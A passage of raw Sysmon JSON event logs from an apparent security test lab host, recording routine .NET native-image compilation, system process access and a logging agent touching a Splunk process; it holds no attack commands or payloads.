:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.279\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-001040160E00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.279","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-001040160E00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.279\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-001040160E00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.279","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-001040160E00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.294\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-001040160E00}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.294","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-001040160E00}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.669\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.669","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:38.732\r\nProcessGuid: {E2A3D6B1-1352-5F25-0000-001040160E00}\r\nProcessId: 4720\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1270-0\\System.AddIn.dll\r\nCreationUtcTime: 2020-08-01 07:01:38.732","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:38.732","ProcessGuid":"{E2A3D6B1-1352-5F25-0000-001040160E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1270-0\\System.AddIn.dll","CreationUtcTime":"2020-08-01 07:01:38.732","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.763\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033240C00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.763","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033240C00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.763\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001033240C00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.763","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001033240C00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010151A0E00}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010151A0E00}","TargetProcessId":"932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:38.794\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-0010CCCC0A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 